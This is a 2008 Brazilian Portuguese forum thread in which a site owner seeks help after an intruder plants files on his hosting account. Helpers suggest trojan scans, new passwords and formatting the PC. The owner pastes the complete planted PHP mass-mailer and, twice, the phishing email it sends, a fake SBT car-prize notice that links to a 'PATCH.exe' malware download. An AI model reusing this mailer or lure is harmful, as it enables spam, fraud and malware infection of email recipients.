22 replies to this topic

[kllaus]

Olá amigos.
Tem um xxxxxx de Brasília (descobri isso pesquisando o IP no registrobr) que de vez em quando acessa meu site e fica horas na index, mas um dia apareceu um link que levava para um formulário de envio, e adivinhem, era aquele e'mail que diz que ganhamos um carro do programa do gugu, mas que na verdade é vírus, descobri isso pq uma vez vi um link que não correspondia com nenhum contido no meu site, era: [ link retirado ]

Aí a minha página não mostrou nada, então resolvi acessar somente [ link retirado ]

Percebi que é aquele e-mail de vírus que chega como se a gente tivesse ganhado um carro no Domingo Legal

Alguém saberia como deter esse cara, pesquisei os IPs dele e todos são de Brasília, os que eu bloqueei foram:

201.2.30.171
189.31.194.62
201.89.251.125
200.138.112.242
189.30.137.231
200.203.24.115

Todos apontam para o mesmo local:

inetnum: 200.203.0/17
asn: AS8167
ID abusos: BTA17
entidade: Brasil Telecom S/A - Filial Distrito Federal
documento: 076.535.764/0326-90
responsável: Brasil Telecom S. A. - CNRS
endereço: SEPS 702/092 Cj. B - Bl B 3 andar Gen. Alencastro, S/N,
endereço: 70390-025 - Brasilia - DF
país: BR
telefone: (61) 415-4201 []
ID entidade: BTC14
ID técnico: BTC14
inetrev: 200.203.24/24
servidor DNS: ns03-cta.brasiltelecom.net.br
status DNS: 21/03/2008 AA
último AA: 21/03/2008
servidor DNS: ns04-bsa.brasiltelecom.net.br
status DNS: 21/03/2008 AA
último AA: 21/03/2008
criado: 18/06/2002
alterado: 25/03/2004

ID: BTA17
nome: Brasil Telecom S. A - Abuso
e-mail: abuse@noc.brasiltelecom.net.br
criado: 24/06/2003
alterado: 14/02/2005

ID: BTC14
nome: Brasil Telecom S. A. - CNRS
e-mail: suporte@noc.brasiltelecom.net.br
criado: 03/10/2003
alterado: 29/02/2008

Atenciosamente,
Cláudio Costa
www.cjcinformatica.com.br

Edição feita por: '' sem.Ponto, 22/03/2008, 10:37.
Retirei os links, pois podem danificar o computador de quem acessar.

[beto]

Cláudio,

movi seu post para a seção correta, criando para ele um tópico.... aqui vc terá respostas mais rapidas...

e por favor, não desenterre tópicos antigos (por exemplo, o que vc postou era de 29/11/2004)


Beto

[kllaus]

Cláudio,

movi seu post para a seção correta, criando para ele um tópico.... aqui vc terá respostas mais rapidas...

e por favor, não desenterre tópicos antigos (por exemplo, o que vc postou era de 29/11/2004)


Beto

OK, desculpe...

Espero que alguém possa me ajudar, pois tenho que ficar até altas horas policiando meu site por cusa desse cara...

['' sem.Ponto]

Um link não aparece no site sem que alguém logue no FTP ou no painel de controle para colocar ele. Pode ser que um robô esteja fazendo isso automaticamente, ou então o próprio hacker está fazendo isso manualmente.

O que quero dizer é que é impossível alguém modificar suas páginas acessando somente a index do site, pois diante do que você disse, é isso que parece que você está pensando. Está errado!

É bem provável que ele consegue logar com sua senha. Como ele descobriu a senha? Seu computador pode estar com um trojan escondido gravando suas senhas.

Recomendo verifcar se tem algum trojan no HD e na memória do computador. Formate o seu HD, mas não basta apenas formatar o HD, pois existem vários vírus que se instalam na memória (assim ele voltaria quando reiniciado). Por isso tem que verificar onde o trojan está.

Feito isso, altere sua senha.

Depois logue no site e retire tudo que foi inserido em suas páginas. Tenha cuidado, não abra nenhuma página do seu site antes de retirar os códigos inseridos.

[kllaus]

Um link não aparece no site sem que alguém logue no FTP ou no painel de controle para colocar ele. Pode ser que um robô esteja fazendo isso automaticamente, ou então o próprio hacker está fazendo isso manualmente.

O que quero dizer é que é impossível alguém modificar suas páginas acessando somente a index do site, pois diante do que você disse, é isso que parece que você está pensando. Está errado!

É bem provável que ele consegue logar com sua senha. Como ele descobriu a senha? Seu computador pode estar com um trojan escondido gravando suas senhas.

Recomendo verifcar se tem algum trojan no HD e na memória do computador. Formate o seu HD, mas não basta apenas formatar o HD, pois existem vários vírus que se instalam na memória (assim ele voltaria quando reiniciado). Por isso tem que verificar onde o trojan está.

Feito isso, altere sua senha.

Depois logue no site e retire tudo que foi inserido em suas páginas. Tenha cuidado, não abra nenhuma página do seu site antes de retirar os códigos inseridos.

blz, vou fazer isso e depois digo o resultado


Tu tinha razão.

Foi detectado um trojan: Backdoor.Prorat.
Excluí o arquivo, limpei todo o cache, arquivos temporários e senhas armazenadas.
Apaguei várias pastas e arquivos estranhos do meu domínio.
Também localizei um banco de dados desconhecido e não consegui apagar, tive que pedir ao servidor para apagar ele.
Também alterei a senha do cpanel.

Desde que fiz isso o cara não entrou mais no meu site, espero que tenha resolvido o problema.

Qualquer coisa posto aqui de novo.

Não adiantou...

O xxxxxx voltou de novo...

Também já formatei o PC mas continua

Edição feita por: kllaus, 22/03/2008, 16:33.

[ThalesWeb]

Altere a senha por outro lugar, coloque uma bem complicada! Se ele continuar conseguindo acessar, o problema não está em trojans do seu pc.

[kllaus]

Ele acabou de acessar de novo, bati um print das informações que meu kayako mostra toda vez que ele entra.

['' sem.Ponto]

Se os dados dele está aparecendo no cpanel, com certeza ele tem a senha... é o mais provável, pois ele está logando mesmo.

Você alterou as senhas antes ou depois de retirar o trojan e formatar o computador? E você olhou se ele também se instalou na memória? Com o kaspersky você consegue ver se tem algo na memória...

O que o DarK ThaleS falou é uma boa idéia para descobrir onde está o problema, seria interessante testar, mas como você já encontrou um trojan no computador, já é motivo para acreditar que o problema está no computador... acontece que alguns trojans são espertos e invadem a kernel do sistema, então, mesmo se formatar o HD, ele volta.

Uma outra coisa que você pode fazer, é ligar para o provedor e ver se tem como restringir o acesso somente para você. Mas... como o provedor utiliza cPanel, é bem capaz que não conseguem fazer isso... é por esse motivo e muitos outros que não gosto do cPanel.

[kllaus]

Este post foi editado por '' sem.Ponto: Ontem, 10:37
Razão por editar: Retirei os links, pois podem danificar o computador de quem acessar.

Não amigo, os links não iam para nenhum vírus, ia apenas para o formulário de envio do SPAM, eu já conferi, acessei pelo meu note para caso houvesse vírus, mas não tinha, seria importante manter os links, pois assim poderiam entender melhor o problema, fico no aguardo da autorização para recolocar os links.

['' sem.Ponto]

Mas...

Será que alguém teria coragem de clicar para ver? Eu mesmo não tive, porque não sei se o seu trojan explora alguma brecha da versão do meu navegador. Isso depende do OS, atualizações, browsers e versões...

Eu tenho uma ótima idéia que não vai deixar ninguém com medo de olhar. O que você acha de tirar um print screen e anexar a imagem aqui no fórum?

[lwirkk]

O mais difícil: Seu servidor de hospedagem ter segurança extremamente baixa.
O mais provável: Seu PC mesmo que está com problemas, trojans e etc.

e você mudou a senha de outro lugar e mesmo assim ele conseguiu acesso, aí...... =X
Mas mesmo tirando o trojan, formatando o PC como você disse, e ainda ele voltou, pode ser seu servidor....

[kllaus]

Como sugerido, eis os prints.

O primeiro link usando meu site envia para a imagem abaixo:



O formulário foi tirado do ar, pois o segundo link leva à imagem abaixo:



Mas o código do segundo link está abaixo, era o que mostrava o segundo link:

<?php

set_time_limit(0);

if($manda)
{
//EMAIL DO DESTINAT?RIO
$destinatario = "$remetente";

//ASSUNTO DO EMAIL
$assunto = "$assunto";

//MENSAGEM DO EMAIL
$mensagem = $html;
$mensagem = stripslashes($mensagem);
//CABE?ALHO DO EMAIL
$headers  = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
/* headers adicionais */
$headers .= "From:<$remetente>\r\n";
$headers .= "Cc: $remetente\r\n";
$headers .= "Bcc: e$remetente\r\n";

//ARQUIVO COM OS EMAILS
$arquivo = $lista;

//LENDO ARQUIVO
$file = explode("\n", $arquivo);
$i = 1;


?><title>spamer priv thundercash</title>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<p>&nbsp;</p>
<?
if($manda) { ?>
<table width="59%" height="30" border="0" align="center" cellpadding="2" cellspacing="1" bgcolor="#333333">
  <tr>
	<td bgcolor="#f5f5f5"> 
	  <?
   foreach ($file as $mail) {

			if(mail($mail, $assunto, $mensagem, $headers))

			   echo "<font color=green face=verdana size=1>* $i - ".$mail."</font> <font color=green face=verdana size=1>uiauia</font><br>";

			else

			   echo "* $i  ".$email[$i]." <font color=red>Não foi!</font><br><hr>";

$i++;
	

}
}
?>
	</td>
  </tr>
</table><? } ?>
<form name="form1" method="post" action="">
  <table width="47%" height="202" border="0" align="center" cellpadding="0" cellspacing="2" bgcolor="#666666">
	<tr> 
	  <td bgcolor="#FFFFFF"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
		  <tr> 
			<td colspan="3" bgcolor="#636666"> <div align="center"><font color="#FFFFFF" size="4" face="Verdana, Arial, Helvetica, sans-serif"><b> 
				</b></font></div></td>
		  </tr>
		  <tr> 
			<td width="21%"><div align="center"><font color="#4A03000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">ASSUNTO:</font></b></font></div></td>
			<td width="1%" bgcolor="#616666">&nbsp;</td>
			<td width="78%">
		 <input name="assunto" type="text" id="assunto3" size="50" value="COMUNICADO SBT BRASIL"></td>
		  </tr>
		  <tr> 
			<td><div align="center"><font color="#4A033000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">REMETENTE:</font></b></font></div></td>
			<td bgcolor="#66623666">&nbsp;</td>
			<td>
		 <input name="remetente" type="text" id="remetente3" value="notification@live-messenger.com" size="24"></td>
		  </tr>
		  <tr> 
			<td><div align="center"><font color="#4A10000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">CODIGO HTML:</font></b></font></div></td>
			<td bgcolor="#6666366">&nbsp;</td>
			<td><textarea name="html" cols="30" rows="4" id="textarea2">
<html>
<head>
  <meta content="text/html; charset=ISO-8859-1" http-equiv="content-type">
  <title>SBT</title>
</head>
<body>
<img alt="" src="http://www.sbt.com.br/images/img0int01.jpg"><br>
<br>
<br>
<br>
<span style="color: rgb(255, 0, 0);">Web Gugu 2008 Domingo Legal!!!</span></a></span><br><br>
<small style="font-weight: bold; color: rgb(51, 51, 153);"><br>
</small><span style="font-weight: bold; color: rgb(51, 51, 153);">Informamos que você foi premiado e ganhou 1 Gol Flex Power 2008 0km.</span><br style="font-weight: bold; color: rgb(51, 51, 153);">
<span style="font-weight: bold; color: rgb(51, 51, 153);">Para maiores informações instale o patch de segurança.</span><br style="font-weight: bold; color: rgb(51, 51, 153);">
<br style="font-weight: bold; color: rgb(51, 51, 153);">
<span style="font-weight: bold; color: rgb(51, 51, 153);">Patch de segurança( <a href="http://tsahq.gmoserver.com/administrator/includes/pcl/PATCH.exe"><span style="color: rgb(255, 0, 0);">CLIQUE AQUI!!!</span></a> )</span><br>
<br>
<span style="font-weight: bold; color: rgb(51, 51, 153);">Logo em seguida Adicione o seu número de identificação no link abaixo para podermos confirmar seu premio!!!</span><br>
<br>
<span style="color: rgb(255, 0, 0);">NÚMERO: [ 3454776 ]</span></a></span><br><br>
<br>
<span style="font-weight: bold; color: rgb(51, 51, 153);">LINK:( <a href="http://www.glazenwassenforreal.nl/images/sbt.html"><span style="color: rgb(255, 0, 0);">http://www.sbt.com.br/domingolegal</span></a> )</span><br>
</body>
</html>



</textarea></td>
		  </tr>
		  <tr> 
			<td><div align="center"><font color="#4A0000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">EMAILS:</font></b></font></div></td>
			<td bgcolor="#6666266">&nbsp;</td>
			<td><textarea name="lista" cols="40" rows="10" id="textarea3"></textarea></td>
		  </tr>
		  <tr> 
			<td><div align="center"></div></td>
			<td bgcolor="#6662666">&nbsp;</td>
			<td>&nbsp;</td>
		  </tr>
		  <tr> 
			<td>&nbsp;</td>
			<td bgcolor="#6626666">&nbsp;</td>
			<td><div align="center"> 
				<input name="manda" type="submit" id="manda" value="Send!">
			  </div></td>
		  </tr>
		  <tr> 
			<td height="23">&nbsp;</td>
			<td bgcolor="#6662666">&nbsp;</td>
			<td><div align="center"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> 
				<b></b></font></div></td>
		  </tr>
		</table></td>
	</tr>
  </table>
</form>

E agora que tentei entrar no segundo link e vi que está fora é que percebi, da hora do almoço pra cá ele não entrou mais, será que acabou meu pesadelo?

Edição feita por: kllaus, 23/03/2008, 21:47.

[Maykel Esser]

mesmo se você colocar o código normal, o hacker volta a colocar esse código acima?

[TTC_VeNdEdOr]

brow, experimenta antes de mais nada trocar o seu browser, usa FireFox

[kllaus]

brow, experimenta antes de mais nada trocar o seu browser, usa FireFox

Não entendi a do browser, pois creio não influenciar no que ELE utilizará.

Mas ontem ele entrou de novo e o bloqueei novamente, por enquanto estou nessa de gato e rato, ele entra e eu bloqueio, vamos ver quem cansa primeiro.

Hoje também verifiquei mais dois arquivos que não tinha visto anteriormente.

Tinha os seguintes arquivos no meu root:

.htaccess
.htaccess(1)
.htaccess18511c22c61f0a5a

Apaguei os dois últimos e substituí o primeiro por um que eu tinha aqui do meu fullbackup.

Até o momento ele não entrou de novo, vamos ver o que acontece.

mesmo se você colocar o código normal, o hacker volta a colocar esse código acima?

Ele não coloca esse código, esse código é o que mostrava o link que eu detectei qd ele entrou, pois uso o Kayako Support Suite e ele mostra em que página o usuário está

Verificando hoje na minha caixa de SPAM, encontrei o E-mail que o fulano envia, eis uma imagem do E-mail:



Abaixo está o código fonte da mensagem:

Delivered-To: forum@cjcinformatica.com.br
Received: by 10.66.238.12 with SMTP id l12cs179420ugh;
		Thu, 13 Mar 2008 16:09:16 -0700 (PDT)
Received: by 10.114.157.1 with SMTP id f1mr10548621wae.10.1205449754029;
		Thu, 13 Mar 2008 16:09:14 -0700 (PDT)
Return-Path: <anonymous@spacecollective.org>
Received: from spacecollective.org (spacecollective.org [72.47.204.44])
		by mx.google.com with ESMTP id k26si7203349waf.8.2008.03.13.16.09.12;
		Thu, 13 Mar 2008 16:09:13 -0700 (PDT)
Received-SPF: pass (google.com: best guess record for domain of anonymous@spacecollective.org designates 72.47.204.44 as permitted sender) client-ip=72.47.204.44;
Authentication-Results: mx.google.com; spf=pass (google.com: best guess record for domain of anonymous@spacecollective.org designates 72.47.204.44 as permitted sender) smtp.mail=anonymous@spacecollective.org
Received: (qmail 25980 invoked by uid 48); 11 Mar 2008 09:08:50 -0700
Date: 11 Mar 2008 09:08:50 -0700
Message-ID: <20080311160850.25977.qmail@spacecollective.org>
content-type: text/html
Subject: COMUNICADO SBT
From: notification@live-messenger.com
To: forum@cjcinformatica.com.br

<html>

<head>

  <meta content="text/html; charset=ISO-8859-1" http-equiv="content-type">

  <title>SBT</title>

</head>

<body>

<img alt="" src="http://www.sbt.com.br/images/img0int01.jpg"><br>

<br>

<br>

<br>

<span style="color: rgb(255, 0, 0);">Web Gugu 2008 Domingo Legal!!!</span></a></span><br><br>

<small style="font-weight: bold; color: rgb(51, 51, 153);"><br>

</small><span style="font-weight: bold; color: rgb(51, 51, 153);">Informamos que você foi premiado e ganhou 1 Gol Flex Power 2008 0km.</span><br style="font-weight: bold; color: rgb(51, 51, 153);">

<span style="font-weight: bold; color: rgb(51, 51, 153);">Para maiores informações instale o patch de segurança.</span><br style="font-weight: bold; color: rgb(51, 51, 153);">

<br style="font-weight: bold; color: rgb(51, 51, 153);">

<span style="font-weight: bold; color: rgb(51, 51, 153);">Patch de segurança( <a href="http://tsahq.gmoserver.com/administrator/includes/pcl/PATCH.exe"><span style="color: rgb(255, 0, 0);">CLIQUE AQUI!!!</span></a> )</span><br>

<br>

 <span style="font-weight: bold; color: rgb(51, 51, 153);">Logo em seguida Adicione o seu número de identificação no link abaixo para podermos confirmar seu premio!!!</span><br>

<br>

<span style="color: rgb(255, 0, 0);">NÚMERO: [ 3454776 ]</span></a></span><br><br>

<br>

<span style="font-weight: bold; color: rgb(51, 51, 153);">LINK:( <a href="http://www.gleamgirls.com/administrator/components/com_comprofiler/errors/sbt.html"><span style="color: rgb(255, 0, 0);">http://www.sbt.com.br/domingolegal</span></a> )</span><br>

</body>

</html>